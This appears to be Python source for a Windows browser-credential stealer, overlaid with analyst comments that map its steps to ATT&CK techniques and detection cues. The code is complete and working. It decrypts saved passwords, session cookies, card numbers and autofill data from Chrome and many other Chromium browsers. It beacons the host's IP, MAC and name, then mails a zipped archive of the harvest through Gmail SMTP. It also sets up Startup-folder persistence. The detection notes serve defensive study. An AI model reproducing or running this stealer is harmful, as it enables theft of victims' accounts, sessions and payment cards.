1#use pip install
2
3#check string 127-129
4#check string 75-77
5# 'sender' work only if server = gmail.com. If you want to use another, rewrite 385 line and 111.
6
7import geocoder
8import requests
9import bs4
10import smtplib
11import shutil
12import sys
13import os
14import socket
15import mimetypes
16import sqlite3
17import socket
18import winreg
19import zipfile
20import random
21import getpass
22import string
23import json
24from email.mime.multipart import MIMEMultipart
25from email.mime.multipart import MIMEMultipart
26from email.mime.text import MIMEText
27from email.mime.image import MIMEImage
28from email.mime.base import MIMEBase
29from email.mime.multipart import MIMEMultipart
30from re import findall
31from shutil import copy2
32from helpers import *
33from dpapi import Win32CryptUnprotectData
34from email import encoders
35from email.mime.base import MIMEBase
36from email.mime.multipart import MIMEMultipart
37import re
38from uuid import getnode as mac
39import getpass
40
41
42
43
# Current Windows account name; used below to build the per-user Startup folder path.
44USER_NAME = getpass.getuser()
45
46
# Analysis note -- persistence routine: writes a batch file named open.bat into the
# current user's Startup folder, a location Windows runs at logon
# (MITRE ATT&CK T1547.001, Startup Folder).
#   file_path -- text placed after `start ""` in the batch file; when left empty it
#                is set to the directory that contains this script.
# Detection: file-creation events for *.bat under
#   ...\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
# where the writing process is a script interpreter rather than an installer.
# Triage: a Startup-folder file called open.bat whose only line is `start "" <path>`.
47def add_to_startup(file_path=""):
48 if file_path == "":
49 file_path = os.path.dirname(os.path.realpath(__file__))
50 bat_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % USER_NAME
# "w+" truncates any existing open.bat before writing.
51 with open(bat_path + '\\' + "open.bat", "w+") as bat_file:
52 bat_file.write(r'start "" %s' % file_path)
53
54
# Executed at module level: prints a single space to stdout.
55print (" ")
56
57
58
59
# Analysis note -- host fingerprinting and beacon: collects the MAC address, the
# address shown by a public "what is my IP" page, and the hostname, then mails the
# three values as separate text/plain parts through Gmail's SMTP submission service.
# Takes no arguments and returns nothing; a send failure is printed and re-raised.
# Detection:
#   * a non-browser process requesting https://2ip.ua/ru/
#   * an authenticated SMTP session to smtp.gmail.com:587 from a workstation
#     process that is not a mail client
#   * mail subject '!!\New info/!!' if mail content is inspectable
# Mitigation: restrict outbound SMTP/submission from end-user hosts to the
# organisation's mail relay.
60def infoall():
61
# uuid.getnode() (imported as `mac`) formatted as six colon-separated hex pairs.
62 macaddres = (':'.join(re.findall('..', '%012x' % mac())))
63
64
65
# Fetches the 2ip.ua page and takes the text of the first element matching
# ".ipblockgradient .ip"; the message below labels this value 'ip'.
66 s = requests.get('https://2ip.ua/ru/')
67 b = bs4.BeautifulSoup(s.text, "html.parser")
68 a = b.select(" .ipblockgradient .ip")[0].getText()
69
70
71 namecomp = (socket.gethostname())
72
73
74
75
# Mailbox settings. In this listing all three values are placeholders
# ('mail' / 'pass'); a deployed copy would carry a real account here.
76 sender = 'mail'
77 gmail_password = 'pass'
78 recipients = ['mail'] # to whom (recipients)
79
80 COMMASPACE = ', '
81
82
83
84
85
86
# One multipart message with three plain-text parts: IP, computer name, MAC.
87 msg = MIMEMultipart()
88 msg['From'] = sender
89 msg['To'] = COMMASPACE.join(recipients)
90 msg['Subject'] = '!!\\New info/!!'
91 msg_text = ('ip' + (a))
92 body = msg_text
93 msg.attach(MIMEText(body, 'plain'))
94
95 msg_text1 = ('name computer' + " " + (namecomp))
96 body = msg_text1
97 msg.attach(MIMEText(body, 'plain'))
98
99 msg_text2 = (' ' + "Mac addres" + " " + ' ' + (macaddres))
100 body = msg_text2
101 msg.attach(MIMEText(body, 'plain'))
102
103
104
105
106 composed = msg.as_string()
107
108
109
# STARTTLS on port 587 followed by a login with the account above; the traffic is
# encrypted after the upgrade, so network detection relies on destination and
# originating process rather than payload.
110 try:
111 with smtplib.SMTP('smtp.gmail.com', 587) as s:
112 s.ehlo()
113 s.starttls()
114 s.ehlo()
115 s.login(sender, gmail_password)
116 s.sendmail(sender, recipients, composed)
117 s.close()
118 print(" ")
# Bare except: reports the exception type on stdout, then re-raises it.
119 except:
120 print("Unable to send the email. Error: ", sys.exc_info()[0])
121 raise
122
123
124
125
126
127
# Module-level mailbox settings read by the __main__ block further down
# (placeholders in this listing).
128sender = 'mail'
129gmail_password = 'pass'
130recipients = ['mail'] # to whom (recipients)
131COMMASPACE = ', '
132
133
134
# Home directory of the account the script runs under; every path below is
# relative to it, so only the current user's browser profiles are in scope.
135pathusr = os.path.expanduser('~')
136
137
# Analysis note -- target list: "User Data" roots of Chrome and other browsers
# keyed by a short label that later becomes part of the output file names.
# Detection: reads of `Login Data`, `Cookies` or `Web Data` beneath any of these
# directories by a process other than the owning browser (MITRE ATT&CK T1555.003,
# T1539). File-access auditing on those three file names is the most direct signal.
138browser_chrome = {
139 'google_chrome': pathusr + "\\AppData\\Local\\Google\\Chrome\\User Data\\",
140 'google_chromex86': pathusr + "\\AppData\\Local\\Google (x86)\\Chrome\\User Data\\",
141 'vivaldi': pathusr + "\\AppData\\Local\\Vivaldi\\User Data\\",
142 'opera': pathusr + "\\AppData\\Roaming\\Opera Software\\",
143 'kometa': pathusr + "\\AppData\\Local\\Kometa\\User Data\\",
144 'orbitum': pathusr + "\\AppData\\Local\\Orbitum\\User Data\\",
145 'comodo_dragon': pathusr + "\\AppData\\Local\\Comodo\\Dragon\\User Data\\",
146 'amigo': pathusr + "\\AppData\\Local\\Amigo\\User\\User Data\\",
147 'torch': pathusr + "\\AppData\\Local\\Torch\\User Data\\",
148 'yandex': pathusr + "\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\",
149 'comodo': pathusr + "\\AppData\\Local\\Comodo\\User Data\\",
150 '360br': pathusr + "\\AppData\\Local\\360Browser\\Browser\\User Data\\",
151 'maxtron': pathusr + "\\AppData\\Local\\Maxthon3\\User Data\\",
152 'kmelon': pathusr + "\\AppData\\Local\\K-Melon\\User Data\\",
153 'chromium': pathusr + "\\AppData\\Local\\Chromium\\User Data\\",
154 'sputnik': pathusr + "\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\",
155 'nichrome': pathusr + "\\AppData\\Local\\Nichrome\\User Data\\",
156 'coccoc': pathusr + "\\AppData\\Local\\CocCoc\\Browser\\User Data\\",
157 'uran': pathusr + "\\AppData\\Local\\Uran\\User Data\\",
158 'chromodo': pathusr + "\\AppData\\Local\\Chromodo\\User Data\\",
159 }
160
161
# Profile sub-directories probed under each root above.
162profiles_chrome = {
163 'profile1': 'Profile 1\\',
164 'profile2': 'Profile 2\\',
165 'profile3': 'Profile 3\\',
166 'default': 'Default\\',
167 'opera': 'Opera Stable\\'
168 }
169
170
# Staging copies of the browser databases, written directly into the user's home
# directory as extension-less files db1, db2 and db3. Nothing in this listing
# deletes them, so they are a useful forensic artefact on a suspected host.
171db = pathusr + "\\db1"
172db2 = pathusr + "\\db2"
173db3 = pathusr + "\\db3"
174
175
176
177
# Analysis note -- saved-login extraction (MITRE ATT&CK T1555.003).
#   file -- path of a browser `Login Data` SQLite database.
# Returns a (count, text) tuple; the text starts with a Russian header meaning
# "logins" and uses Russian labels for site / login / password.
# The database is first copied to the db1 staging path and the copy is queried.
# Win32CryptUnprotectData comes from a local `dpapi` module that is not part of
# this listing; presumably it wraps the Windows DPAPI unprotect call, which only
# succeeds in the logon context of the user who stored the secret -- TODO confirm.
# The SQLite connection is never closed in this function.
# Mitigation: do not keep credentials in the browser store on shared or exposed
# hosts; multi-factor authentication limits the value of any password taken this way.
178def login_chrome(file):
179 count = 0
180 logindata = "============логины=============\r\n"
181 copy2(file, db)
182 con = sqlite3.connect(db)
183 cursor = con.cursor()
184 cursor.execute("SELECT origin_url, username_value, password_value from logins;")
185 for origin_url, username_value, password_value in cursor.fetchall():
186 password = Win32CryptUnprotectData(password_value).decode("utf-8")
187 if password is not False:
188 if origin_url is not '':
189 logindata += 'САЙТ : ' + str(origin_url) + '\r\n'
190 if username_value is not '':
191 logindata += 'ЛОГ : ' + str(username_value) + '\r\n'
192 if password_value is not '':
193 logindata += 'ПАСС : ' + str(password) + '\r\n\r\n'
194 count += 1
195 return(count, logindata)
196
197
# Analysis note -- session-cookie extraction (MITRE ATT&CK T1539).
#   file -- path of a browser `Cookies` SQLite database.
# Returns a (count, text) tuple. The database is copied to the db2 staging path
# and the `cookies` table of the copy is read; each row becomes one tab-separated
# line of host, fixed TRUE, "/", fixed FALSE, last-access time, name and value.
# The header literal is Russian (appears to be slang for "cookies").
# Why it matters to defenders: a stolen session cookie can stand in for a completed
# login, so password resets alone do not evict the holder -- active sessions for
# the affected accounts have to be revoked as part of response.
198def cook_chrome(file):
199 count = 0
200 cookdata = "============печени=============\r\n"
201 copy2(file, db2)
202 con = sqlite3.connect(db2)
203 cursor = con.cursor()
204 cursor.execute("SELECT host_key, name, value, path, last_access_utc, encrypted_value \
205 FROM cookies;")
206 for host_key, name, value, path, last_access_utc, encrypted_value in cursor.fetchall():
# Falls back to the plaintext `value` column, then to 0, when the decrypted
# result is empty.
207 decrypted = Win32CryptUnprotectData(encrypted_value).decode("utf-8") or value or 0
208 if decrypted is not False:
209 cookdata += str(host_key) + "\tTRUE\t" + "/" + '\tFALSE\t' + str(last_access_utc) + '\t' + \
210 str(name) + '\t' + str(decrypted) + '\n'
211 count += 1
212 return(count, cookdata)
213
214
# Analysis note -- payment-card and autofill extraction from a browser `Web Data`
# SQLite database (MITRE ATT&CK T1555.003).
#   file -- path of the `Web Data` file.
# Returns a (count, text) tuple. The database is copied to the db3 staging path
# and four tables of the copy are read in turn: credit_cards, autofill_profiles,
# autofill_profile_emails and autofill_profile_names.
# Section headers and labels are Russian runtime strings: "money" (cards),
# "info" (addresses), "emails", "deanon" (names); card labels are cardholder
# name, month, year, card number and billing.
# Response note: if this has run on a host, treat every card and address stored
# in that browser profile as disclosed.
215def web_chrome(file):
216 count = 0
217 webdata = "============деньги=============\r\n"
218 copy2(file, db3)
219 con = sqlite3.connect(db3)
220 cursor = con.cursor()
# Stored payment cards; the encrypted number column is passed to the DPAPI helper.
221 cursor.execute("SELECT name_on_card, expiration_month, expiration_year,\
222 card_number_encrypted, billing_address_id FROM credit_cards;")
223 for name_on_card, expiration_month, expiration_year,\
224 card_number_encrypted, billing_address_id in cursor.fetchall():
225 decrypted = Win32CryptUnprotectData(card_number_encrypted).decode("utf-8")
226 if decrypted is not False:
227 if name_on_card is not '':
228 webdata += 'ИМЯ КАРТХОЛДЕРА: ' + name_on_card + '\r\n'
229 if expiration_month is not '':
230 webdata += 'МЕСЯЦ: ' + expiration_month + '\r\n'
231 if expiration_year is not '':
232 webdata += 'ГОД: ' + expiration_year + '\r\n'
233 if card_number_encrypted is not '':
234 webdata += 'НОМЕР КАРТЫ: ' + decrypted + '\r\n'
235 if billing_address_id is not '':
236 webdata += 'БИЛЛИНГ: ' + billing_address_id + '\r\n\r\n'
237
238
# Saved postal-address profiles (stored unencrypted in the database).
239 cursor.execute("SELECT guid, company_name, street_address,\
240 dependent_locality, city, state, zipcode, sorting_code,\
241 country_code, date_modified, origin, language_code,\
242 use_count, use_date, validity_bitfield FROM autofill_profiles")
243
244 for company_name, street_address,\
245 dependent_locality, city, state, zipcode, sorting_code,\
246 country_code, date_modified, origin, language_code,\
247 use_count, use_date, validity_bitfield in cursor.fetchall():
248 webdata += "============информ=============\r\n"
249 if company_name is not '':
250 webdata += company_name + '\r\n'
251 if street_address is not '':
252 webdata += street_address + '\r\n'
253 if dependent_locality is not '':
254 webdata += dependent_locality + '\r\n'
255 if city is not '':
256 webdata += city + '\r\n'
257 if state is not '':
258 webdata += state + '\r\n'
259 if zipcode is not '':
260 webdata += zipcode + '\r\n'
261 if sorting_code is not '':
262 webdata += sorting_code + '\r\n'
263 if country_code is not '':
264 webdata += country_code + '\r\n'
265 if date_modified is not '':
266 webdata += date_modified + '\r\n'
267 if origin is not '':
268 webdata += origin + '\r\n'
269 if language_code is not '':
270 webdata += language_code + '\r\n'
271 if use_count is not '':
272 webdata += use_count + '\r\n'
273 if use_date is not '':
274 webdata += use_date + '\r\n'
275 if validity_bitfield is not '':
276 webdata += validity_bitfield + '\r\n'
277 if company_name is not '':
278 count += 1
279 webdata += '\r\n\r\n'
280
281
# Saved e-mail addresses from autofill.
282 cursor.execute("SELECT email FROM autofill_profile_emails")
283 for email in cursor.fetchall():
284 webdata += "============имейлы=============\r\n"
285 if email is not '':
286 webdata += email + '\r\n'
287 count += 1
288
289
# Saved personal names from autofill.
290 cursor.execute("SELECT first_name, middle_name, last_name,\
291 full_name FROM autofill_profile_names")
292 for first_name, middle_name, last_name, full_name in cursor.fetchall():
293 webdata += "============деанон=============\r\n"
294 if first_name is not '':
295 webdata += first_name + '\r\n'
296 if middle_name is not '':
297 webdata += middle_name + '\r\n'
298 if last_name is not '':
299 webdata += last_name + '\r\n'
300 if full_name is not '':
301 webdata += full_name + '\r\n'
302 count += 1
303
304 return(count, webdata)
305
# Analysis note -- collection driver: walks every browser root in browser_chrome
# and every profile in profiles_chrome, and for each combination that exists runs
# the three extractors above on `Login Data`, `Cookies` and `Web Data`.
#   savefolder -- directory that receives the plaintext result files.
# Returns a (countpass, countcook, countdata) tuple.
# check_exists comes from the star-import of a local `helpers` module that is not
# part of this listing; presumably a path-existence test -- TODO confirm.
# Artefacts: files named <browser>_<profile>_logins.txt, <browser>_<profile>_cookie.txt
# and <browser>_<profile>_ccdata.txt inside savefolder, holding the harvested data
# in clear text until the folder is removed.
# Every extractor call is wrapped in `except Exception`, which discards the error
# without output, so a failed run leaves no console or log trace of its own.
306def getXpom(savefolder):
307 countpass, countcook, countdata = 0, 0, 0
308 for browser_key, browser_folder in browser_chrome.items():
309 if check_exists(browser_folder):
310 for profile_key, profile_folder in profiles_chrome.items():
311 if check_exists(browser_folder+profile_folder):
312 if check_exists(browser_folder+profile_folder+"\\Login Data"):
313 try:
314 countpass, logindata = login_chrome(browser_folder+profile_folder+"\\Login Data")
315 with open(savefolder + '\\' + browser_key+"_"+profile_key+'_logins.txt', "w")\
316 as file:
317 file.write(logindata)
318 except Exception as e:
319 countpass += 0
320
321 if check_exists(browser_folder+profile_folder+"\\Cookies"):
322 try:
323 countcook, cookdata = cook_chrome(browser_folder+profile_folder+"\\Cookies")
324 with open(savefolder + '\\' + browser_key+"_"+profile_key+'_cookie.txt', "w")\
325 as file:
326 file.write(cookdata)
327 except Exception as e:
328 countcook += 0
329
330 if check_exists(browser_folder+profile_folder+"\\Web Data"):
331 try:
332 countdata, webdata = web_chrome(browser_folder+profile_folder+"\\Web Data")
333 with open(savefolder + '\\' + browser_key+"_"+profile_key+'_ccdata.txt', "w")\
334 as file:
335 file.write(webdata)
336 except Exception as e:
337 countdata += 0
338
339 return(countpass, countcook, countdata)
340
# Analysis note -- entry point: stage, archive, exfiltrate, clean up.
#   1. creates a staging directory  C:\Users\<user>\AppData\Local\Temp\browsers<15 chars>
#   2. fills it through getXpom()
#   3. zips it to  C:\Users\<user>\AppData\Local\Temp\<user><15 chars>.zip
#      (MITRE ATT&CK T1560.002, archive via library)
#   4. mails the archive as an attachment through smtp.gmail.com:587
#      (MITRE ATT&CK T1048, exfiltration over an alternative protocol)
#   5. deletes the archive and the staging directory
# The 15-character suffix is drawn from A-Z and 0-9.
# Detection:
#   * directory creation matching  %LOCALAPPDATA%\Temp\browsers[A-Z0-9]{15}
#   * a zip named <username>[A-Z0-9]{15}.zip in the same Temp folder
#   * the same process then opening an authenticated session to smtp.gmail.com:587
#   * mail subject 'Stiller!' where content inspection is available
# The staging directory and archive exist only briefly, so process and file
# telemetry is more dependable than a later disk sweep; the db1/db2/db3 copies in
# the user's home directory are not touched by the clean-up below.
341if __name__ == '__main__':
342 name_0f_user = getpass.getuser()
343 name_0f_pc = socket.gethostname()
344
345 browsers = "C:\\Users\\" + name_0f_user + "\\AppData\\Local\\Temp\\browsers" + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(15))
346 if not check_exists(browsers):
347 os.mkdir(browsers)
348 getXpom(browsers)
349
350
351 TEMP_FILE = "C:\\Users\\" + name_0f_user + "\\AppData\\Local\\Temp\\" + name_0f_user + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(15)) + ".zip"
352
# zipdir is supplied by the local `helpers` module (not shown); presumably it adds
# the directory tree to the open archive -- TODO confirm.
353 zipf = zipfile.ZipFile(TEMP_FILE, 'w', zipfile.ZIP_DEFLATED)
354 zipdir(browsers, zipf)
355 zipf.close()
356
357
# Outer message uses the module-level sender / recipients settings.
358 outer = MIMEMultipart()
359 outer['Subject'] = 'Stiller!'
360 outer['To'] = COMMASPACE.join(recipients)
361 outer['From'] = sender
362 outer.preamble = 'You will not see this in a MIME-aware mail reader.\n'
363
364
365 attachments = [TEMP_FILE]
366
367
# The archive is attached as base64-encoded application/octet-stream under its
# own file name.
368 for file in attachments:
369 try:
370 with open(file, 'rb') as fp:
371 msg = MIMEBase('application', "octet-stream")
372 msg.set_payload(fp.read())
373 encoders.encode_base64(msg)
374 msg.add_header('Content-Disposition', 'attachment', filename=os.path.basename(file))
375 outer.attach(msg)
376 except:
377 print("Unable to open one of the attachments. Error: ", sys.exc_info()[0])
378 raise
379
380 composed = outer.as_string()
381
382 # Send the email
383 try:
384 with smtplib.SMTP('smtp.gmail.com', 587) as s:
385 s.ehlo()
386 s.starttls()
387 s.ehlo()
388 s.login(sender, gmail_password)
389 s.sendmail(sender, recipients, composed)
390 s.close()
391 print("Wait")
392 except:
393 print("Unable to send the email. Error: ", sys.exc_info()[0])
394 raise
395
# Clean-up of the archive and staging directory; an OSError here is ignored.
396 try:
397 os.remove(TEMP_FILE)
398 shutil.rmtree(browsers)
399 except OSError:
400 pass
401
402
403
404
405
406
407
# Analysis note: both calls sit at module level, outside the __main__ guard, so
# the host beacon and the Startup-folder write run whenever this file is executed
# or imported. On a suspected host, check for the Startup-folder open.bat and for
# SMTP submission traffic from the interpreter process.
408infoall()
409add_to_startup()